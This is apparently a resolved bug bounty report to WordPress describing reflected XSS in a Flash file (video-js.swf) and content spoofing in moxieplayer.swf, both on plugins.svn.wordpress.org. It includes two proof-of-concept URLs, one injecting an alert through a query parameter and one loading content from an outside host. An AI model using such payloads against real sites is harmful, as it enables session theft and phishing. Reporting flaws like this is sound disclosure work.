Reflected Swf XSS In ( plugins.svn.wordpress.org )
Medium
W
WordPress
Submitted None
Actions:
Reported by
m7mdharoun
Vulnerability Details
Technical details and impact analysis
Hello ,
I have found XSS in flash File ( video-js.swf ) in plugins.svn.wordpress.org
and Content Spoofing Vulnerability in moxieplayer.swf
** POC **
https://plugins.svn.wordpress.org/1player/tags/1.3/players/video-js/video-js.swf?readyFunction=alert(%27Hello%27)
{F222664}
https://plugins.svn.wordpress.org/agile-video-player/trunk/js/plugins/media/moxieplayer.swf?url=hekimuso1973.xsl.pt/723.flv
Report Details
Additional information and metadata
State
Closed
Substate
Resolved